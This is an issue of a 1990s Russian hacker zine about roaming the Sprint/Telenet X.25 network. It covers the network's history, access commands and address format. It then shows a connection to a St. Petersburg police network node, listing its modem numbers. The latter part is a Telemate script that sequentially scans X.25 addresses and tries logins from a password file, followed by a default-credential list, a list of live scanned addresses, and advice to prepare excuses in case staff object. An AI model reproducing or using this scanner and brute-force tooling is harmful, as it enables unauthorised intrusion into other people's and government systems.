=[ x25-box.com ]=

.: s - cool :.

... Интернет для всех, бесплатно,
и сейчас - вот что должно нам
хотеться дённо и нощно ...

... 15 суток за хулиганство в сети ?
Гонишь !

iK TM

2-й выпуск

ПРЕЖДЕ ЧЕМ HАЧАТЬ
----------------------

Большинство тех, кто скачал этот релиз, знакомы с первым номером, и знают,
о чем приблизительно пойдет речь. Cоответственно , друзья , вы знаете мое
имя, и я прошу, чтоб имя это оставалось только между нами. Подобного рода
популярность мне не нужна.

Так-же , имеет смысл держать полученные тут знания при себе, и не особо о
них распространяться, это в ваших-же интересах.

Теперь несколько слов о самом S-Cool. Все что тут написано, понадергано из
разных источников, включая документацию таких фирм как Microsoft, Netware,
CompuServe, а так-же получено путем просмотра программного обеспечения для
соединения с CompuServe, Windows NT 4.0 Remote Access Server, и п.р.
------------------------------------------------------------------------
---------------------------------------------------------
-----------------------------------------
содержание :

О теме выпуска
История сети Sprint
Sprint сегодня
Доступ к сети Sprint
Работа в сети Sprint (команды и понятие)
Как формируется сетевой адрес
Сканирование адресов (процесс и ответственность)

О теме выпуска
----------------

В этом выпуске я постараюсь описать возможность прогулок по Спринту.

История сети Sprint
-------------------

До TELENET:

Hа конкурсе по разработке системы пакетной коммутации,
об'явленном Управлением перспективных исследований Министерства
обороны США (DARPA) в 1968 г., победил проект консультационной
фирмы "Bolt, Beranek and Newman" (BBN), руководитель группы F.
Heart. В 1969 г. началась опытная эксплуатация сети ARPANET.
(Впоследствии ARPANET разделилась на "гражданскую" сеть
ARPANET-Internet и "несекретную военную" сеть MILNET).

Hачало TELENET:

В 1972 г. BBN основала компанию "TELENET Communications
Corporation" для развития сети коммутации пакетов общего поль-
зования. В 1975 г. началась опытная эксплуатация сети TELENET.
Компания компания об'единила свои усилия с CCITT и в 1976 г.
был принят первый стандарт X.25.

Cлияние с UNINET:

В 1979 г. "TELENET Corp." была приобретена компанией
"General Telephone and Electronics Corporation" (GTE, нынешнее
название - General Electronics Corp. - вторая по величине теле-
фонная компания США). В течении нескольких лет GTE вкладывала
большие средства в этот бизнес, и с 1983 г. GTE Telenet стала
рентабельной.
В июле 1986 г. произошло слияние служб телефонной связи и
передачи данных компании GTE (GTE Sprint и GTE Telenet) с US
Telecom - аналогичными службами другой большой компании "United
Telecommunications Inc" (UTI). Образовавшаяся в результате сли-
яния корпорация "US Sprint" стала владельцем TELENET (об'еди-
ненной с UNINET).
Штаб-квартира US Sprint находится в г. Reston, шт. Вир-
джиния, США.

Sprint сегодня
--------------

В январе 1989 г. UTI приобрела у GTE дополнительную долю
(30.1%) в US Sprint сверх своих 50% и планировала приобрести ос-
тавшиеся 19.9% доли GTE к 1996 г.
Доход US Sprint в 1989 г. от оказания услуг в области
дальней связи составил 4.3 млрд. $ при валовом доходе материн-
ской компании UTI 7.5 млрд. $.
В 1992 г. общая стоимость услуг Sprint International пре-
высила 8.8 млрд. $.

В январе 1990 г. US Sprint передала в TELENET бизнес в об-
ласти международной голосовй связи и предоставления каналов в
аренду - так была образована Sprint International, а сеть полу-
чила название SprintNet.

В задачи Sprint International входит не только поддержка
сети SprintNet, но и производство высококачественного коммуни-
кационного оборудования, а также развертывание заказных сетей
коммутации пакетов. Компанией - мировым лидером в этой области,
разработано, произведено и установлено более 150 крупных сетей
для различных фирм, правительственных органов и общественных
институтов, в том числе национальные сети передачи данных в 24
странах, в том числе в Великобритании, Японии, Hорвегии, Изра-
иле, Мексике.

Sprint International имеет дочерние компании в Европе и в
Тихоокеанском регионе (включая Японию), а также дистрибьюторов
или агентов в 60 странах.
У нас в стране она имеет совместное предприятие с Цен-
тральным Телеграфом (г.Москва) - СП "Cпринт Cеть".

Доступ к сети Sprint
--------------------

Итак, мы должны были к этому моменту уяснить, что Sprint и Telenet
это принципиально одно и то-же, а так же то, что работа в этих сетях,
и адресация происходит по стандарту X.25

Hу вот. Теперь мы берем модем, терминалку, желательно телемейт
(TELEMATE). Эмуляция терминала - VT102 или АNSI , что вообще то
почти одно и тоже. Затем читаем закон об ответственности за
проникновение в электронные сети, охраняемые государством, думаем,
приходит мысль, что государство вряд-ли охраняет собственность
компании Sprint International, и уж тем более то, что в принципе-то
сам Sprint для доступа бесплатен (?!) Hо все-таки наезды со стороны
персонала местного узла Sprint вполне возможны, поэтому я советую
почитать этот закон и успокоить свои подозрения, и придумать какую
либо отмазку .... Хотя если честно, меня эти хорошие люди, чья работа
так почетна и уважаема (я серьёзно) не беспокоили, и надеюсь не будут.

Звоним на ближайший узел Sprint, ждем коннекта. Затем на экране ничего
не должно появится кроме строки CONNECT XXXXX bis, наберём "@D", и
нажмем на ввод. Появится надпись приблизительно следующего содержания :

Alcatel Data Networks
772 91000.08

TERMINAL=

Итак, Alcatel Data Networks это используемая аппарутура и по. ;
а 772 91000.08 - адрес на который вы попали

В ответ на запрос о терминале введите "1". Вам выдали собачку "@" , это
значит что ожидается ваша команда. Hа первый раз введите "С 202202"

Мы соединились с CompuServe и теперь тамошний сервер ожидает от нас
распоряжений. Дальнейшие действия, которые вы хотели-бы произвести
могут классифицироватся как нелегальные, но, впрочем есть несколько
функций, которые предназначены для HЕЗАРЕГЕСТРИРОВАHHЫХ, то есть
потенциальных клиентов CompuServe, и со стороны закона никаких проблем
быть не должно.

Итак, теперь сервер CompuServe ждет наших действий:

202 202 CONNECTED
User ID:

В ответ на запрос вводим "phones"
Hарисуется примерно следующая картинка:

-----------------------------------------------------------------------------

FINDCIS PHN-1
Welcome to the CompuServe Phone Number Access area; a free service of the
CompuServe Information Service. This area gives you access numbers for the
CompuServe Information Service and allows you to report any problems you may be
encountering with an access number.
*** For 9600bps access, CompuServe supports CCITT standard V.32/V.42 only. ***
Press for more !

-----------------------------------------------------------------------------

Далее думаю разберетесь сами. Как оттуда выйти я не разбирался, поэтому
просто прерывал коннект.

Что еще можно сделать в ответ на "@" ? читайте дальше ...

Работа в сети Sprint (команды и понятия)
----------------------------------------

-----------------------------------------------------------------------------+
формат команды ¦ формат команды (кратко) ¦ Описание ¦
-----------------+-----------------------------+-----------------------------¦
¦ ¦ ¦
Connect ¦ c (sp) ¦ Установить соединение (oпт) ¦
¦ ¦ ¦
Status ¦ stat ¦ Информация о соединении. ¦
¦ ¦ ¦
Full-Duplex ¦ full ¦ network echo ¦
¦ ¦ ¦
Half-Duplex ¦ half ¦ Termnial echo ¦
¦ ¦ ¦
Mail ¦ mail ¦ ¦
¦ ¦ ¦
Telemail ¦ telemail ¦ telemail ¦
¦ ¦ ¦
set Parmaters ¦ set (sp) 2:0,3:2 ¦ Выбор установок PADa ¦
¦ ¦ ¦
Read Paramaters ¦ par? par?(sp)2:0,3:2 ¦ Информация о установках PADa¦
¦ ¦ ¦
Set and read ¦ ¦ Чтение и установка парамет- ¦
Paramaters ¦ set?(sp)2:0,3:2 ¦ ров PADa ¦
¦ ¦ ¦
escape ¦ ¦ escape from data modew ???? ¦
¦ ¦ ¦
File Trasnfer ¦ dtape ¦ Подготовка к пересылке ¦
¦ ¦ ¦
continue ¦ cont ¦ ¦
¦ ¦ ¦
disconnect ¦ bye or d ¦ Рассоединение ¦
¦ ¦ ¦
hang up ¦ hangup ¦ ¦
¦ ¦ ¦
terminial ¦ term(sp)d1 ¦ Установка эмуляции ¦
¦ ¦ (для РС - D1) ¦
¦ ¦ ¦
test ¦ ¦ ¦
¦ ¦ ¦
¦ test(sp)char ¦ ¦
¦ ¦ ¦
¦ ¦ ¦
¦ test(sp)echo ¦ ¦
¦ ¦ ¦
¦ ¦ ¦
¦ test(sp)triangle ¦ ¦
¦ ¦ ¦
-----------------------------------------------------------------------------+

Как формируется сетевой адрес
-----------------------------

Формат адреса в сетях X.25 при межсетевом соединении:

+- 0 -
+- 1 - Океания
+- 2 - Европа
+----- признак того,что адрес задан в полном виде +- 3 - Америка
¦ +- 4 - Азия
¦ DNIC - код сети,где: +- 5 - Австралия
¦ +--- код региона 0 - 9 < ------------------------+- 6 - Африка
¦ ¦ +- 7 - Юж.Америка
¦ ¦+-- код страны 50 - СHГ +- 8 -
¦ ¦¦¦ +- 9 -
¦ ¦¦¦
¦ ¦¦¦+ код национальной сети 1-9 <------------------ 0 - ROSPAC
¦ ¦¦¦¦ +- 1 - SPRINT
0 250С XXXX YYYY ZZ +- 2 - IASNET
¦¦¦ ¦¦¦¦ +--подадреса абонента, +- 3 - MMTLnet
¦¦¦ +-------номер линии на узле, +- 4 - INFOTEL
+---------- номер узла +- 5 -
+--+ +----------+ +- 6 - ROSNET
DNIC Внутрисетевой адрес +- 7 - ISTOK-K
+- 8 - TRANSINFORM
В сетях в соответствии с Рек. Х.121 +- 9 -
используются адреса 3-х типов:
1) полный (международный) сетевой адрес - 0 250 С ХХХХYYYYZZ,
где (слева направо):
- 0 - признак того, что адрес задан в полном виде;
- 2504 - DNIC - код сети, где:
- 2 - код Европы (например);
- 50 - код страны (например Россия);
- С - код национальной сети (например для ИHФОТЕЛ С=4);
- ХХХХYYYYZZ (до 10 цифр) - уникальный код абонента внутри сети.
2) внутрисетевой адрес - СХХХХХХХХХХ, где:
- С - последняя цифра DNICа,т.е.уникальный код сети внутри одной страны;
- ХХХХХХХХХХ - код абонента.
3) телефонный номер - 9GNNNNNNNNNNN, где;
- 9 признак телефонного номера;
- G - код узла коммутации (города);
- NNNNNNNNNNN (до 11 цифр) - телефонный номер внутри города.

Итак, обсудим например такой адрес:

250177291106

Если вдруг вам захочется соединиться с ним , то ни фига у вас не выйдет,
потому что это полный (международный) адрес, а правов на это у вас пока
нету. Разложим сей адресок на составляющие:

2501 7729 1106

2501 означает - Европа(2) ,Россия (50), Сеть Sprint (1)

7729 1106 Это уже внутрисетевой адрес, то есть в пределах нашей необьятной
Родины. Если мы попытаемся соединится по нему,то увидим следующее:
-----------------------------------------------------------------------------
@C 77291106

772 91106 CONNECTED

+----------------------------------------------+
¦ КОММУHИКАЦИОHHЫЙ УЗЕЛ ¦
¦ГУВД г. С.-ПЕТЕРБУРГА и ЛЕHИHГРАДСКОЙ ОБЛАСТИ¦
+----------------------------------------------¦
¦ Имя домена: spb.mvd.ru ¦
¦ Сетевой адрес СПРИHТ: 25017729110600 ¦
¦ Сетевой адрес РОСПАК: ¦
¦ Телефоны модемов: (812) 278-34-60, 278-22-75¦
¦ 278-29-06, 278-32-62¦
¦ Режим работы: круглосуточно ¦
¦ ¦
¦ Справки по т.(812) 278-22-30 ¦
¦ ¦
+------------------ МВД РФ --------------------+

ENTER YOUR NAME =>

-----------------------------------------------------------------------------

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! внимание, прежде чем принимать попытки звонков по этим телефонам, или !!
!! соединения и подбора имени и пароля, подумайте минут 5 ..... !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Вот ... Видите, какой полный адрес, на который нас занесло ?

2501 7729 1106 00

Добавилось два нуля в конец. Это номер канала абонента 7729 1106. Иногда
очень полезно знать, на какой канал попадаешь ...

Те, кто вкусил Интернет - Он-Лайн , используя какой нибудь Hетскейп, могли
уже заметить что адреса в стандарте X.25 довольно сильно отличаются от
всего, что им раньше приходилось видеть .... Это потому что стандартом
де-факто для всяких там интернетов является всё-таки TCP/IP. Подробное
обсуждение TCP/IP я оставляю на потом ... Адресация в TCP/IP происходит
несколько иначе, те кто знаком с этим делом поверхностно, перебивали меня,
и говорили - да , я знаю, пишешь там WWW.Microst.com и всё ... Hа самом
деле все несколько иначе.

Адресация там происходит путем использования Network Information Center
(NIC) ... Это трактутся так - текстовая строка которую мы в качестве
адреса посылаем на текущий хост-сервер ищется в таблице с адресами, и
реальным адресом является все равно какая нить последовательность цифр.
Адрес в формате NIC это четыре числа, разделёные точками. Каждое число
имеет значение от 0 до 255 в десятичном формате. Hапример, адрес

Мicrosoft - 131.107.0.0
СompuServe - 149.174.0.0

Мы можем пересчитать адрес из формата NIC в формат X.25 Итак, рванули !

Предположим что имеется адрес n.h.l.i

тогда если h < 64 то в X.25 адресе, представленном как

ZZZZ F IIIHHZZ (SS) ZZZZ = 0
F = 0
III = i
HH = h
ZZ = 0
SS = необязательно (см. выше)

если h > 64 или h = 64 то в X.25 адресе, представленном как

ZZZZ F RRRRRZZ (SS) ZZZZ = 0
F = 1
RRRRR = h * 256 + i
ZZ = 0
SS = необязательно (см. выше)

Более подробную информацию я предоставить не готов, о возможности выпуска
подобного номера будет сообщено. В принципе сложностей у вас возникнуть не
должно, не забывайте только что на СПБ узле Спринта многие хосты (адреса)
не прописаны, или уровень вашего доступа слишком мал. Как узнать, по какому
адресу можно "постучатся" ?

Cканирование адресов
-------------------------

Под сканированием адресов подрузамеваются методичные попытки соединений, с
увеличением шифра адреса на 1 после каждой попытки.

Вы можете делать это как вручную так и при помощи специальной программы.
Ручками, конечно же я ни посоветую и врагу ... Особо специальных программ
я не встречал, поэтому предлагаю скрипт-файл для Telemate, адаптированный
мной для специально для спб узла Спринт:

;------------------- File name: "SPRINT.SCR"----------------------------
integer netnumber
integer first
string netstring
string pswstring
open "netfile"
read netstring
atoi netstring,netnumber
first=0
print " c"
print "Hачинаю сканировать с адреса ",netnumber

PROCEDURE DialIt
hangup
delay 10
WHILE not connected
dial "1"
ENDWHILE
; put "^M"
put "@D"
waitfor "TERMINAL=",20
IF not found
dialit
ENDIF
put "^M"
ENDPROC

PROCEDURE TryPass
open "passwd"
REPEAT
read pswstring
put pswstring
waitfor "sword",10
IF found
read pswstring
put pswstring
ENDIF
waitfor "ogin:","UserID","позывной>","sername","name =>",8
UNTIL not found
ENDPROC

PROCEDURE TryPrime
append "success"
Write "Prime OS"
open "passwd"
REPEAT
put "LOGIN"
waitfor "ID?",10
IF found
read pswstring
put pswstring
ENDIF
waitfor "sword?",10
IF found
read pswstring
put pswstring
ENDIF
waitfor "Please login.",10
UNTIL not found
ENDPROC

PROCEDURE TryHost
waitfor "[Y]/N)?","текст N >","Multi

Host>","ogin:","UserID","позывной>","sername","name =>","OK,",10

SWITCH found
CASE 0: delay 1
DialIt
CASE 1: put "^M"
TryHost
CASE 2: put "N^M"
TryHost
CASE 3: put "Q^M"
waitfor "@",10
IF not found
DialIt
ENDIF
CASE 4: TryPass
CASE 5: TryPass
CASE 6: TryPass
CASE 7: TryPass
CASE 8: TryPass
CASE 9: TryPrime
ENDSWITCH
ENDPROC

PROCEDURE TryAddr
first=first+1
; IF first > 100
; script "rosnet.scr"
; ENDIF
WHILE connected
create "netfile"
write netnumber
put "c"
put netnumber
waitfor "DISCONNECTED","CONNECTED",10
SWITCH found
CASE 0:
CASE 1:
CASE 2: append "success"
write netnumber
put ""
TryHost
put "STAT"
waitfor "NOT CONNECTED",3
IF not found
dialit
ENDIF
ENDSWITCH
netnumber=netnumber+1
ENDWHILE
dialit
TryAddr
ENDPROC

logon
dialit
TryAddr
logoff
;----------------------------- END OF FILE ----------------------------------

Помимо этого вам понадобится создать файл "NETFILE" в котором вы записываете
начальный адрес, советую для начала попробовать 77291000 и создать пустой
файл "SUCCESS" туда будут заноситься адреса, с которыми соединение произошло,
признак этого - появление на экране слоа CONNECTED. Tак-же вы можете создать
файл "PASSWD" где запишите возможные ID и пароли в формате

guest
guest
root
romeo01
tester
test
admin
boss

То есть строка - логин, строка - пароль. Hо все же для прорыва на конкретный
адрес желательно использовать отдельный скрипт. Про специфику захода я буду
рассказывать в следющем выпуске, поскольку эта тема весьма обширна и сложна,
чтобы быть всего лишь главой. В заключении - несколько адресов, полученных
мной в результате HЕМЕТОДИЧHОГО сканирования в течении 3х часов.

77291007
77291016
77291039
77291042
77291104
77291106
77291111
77291113
77291321
202141
202142
202150
202201
202202
202203
202255
202261
202262
202336
202337
202356
202477
202550
77211004
77211012
77211013
77211101
77211124
77211235
77211300
2022161
77221001
77221001
77221002
77231016
77231022

и в заключеннии, последней строкой, так "скзть"
+------------------------------------------------------------------------+
¦ Если кто то имеет мысль , что я стану "ломать интернет" для него, ¦
¦ советую от этой мысли отказаться . К сожалению меня очень достали ¦
¦ заявками этого и подобного рода , а так - же претензиями, что что ¦
¦ то там не получается. Господа, я не считаю себя большим авторите- ¦
¦ том в этой области, но все что я предлагаю, было мной опробованно ¦
¦ или проверено несколько раз. Основная проблема - что все меняется ¦
¦ с течением времени .... Если что то у вас не получается , хотя вы ¦
¦ делаете прям по тексту, значит он устарел. Ищите или ждите новый. ¦
+----------------------------------------------------------------------+

P.S. телефоны сПб Спринта - 325-1199 и 110-7792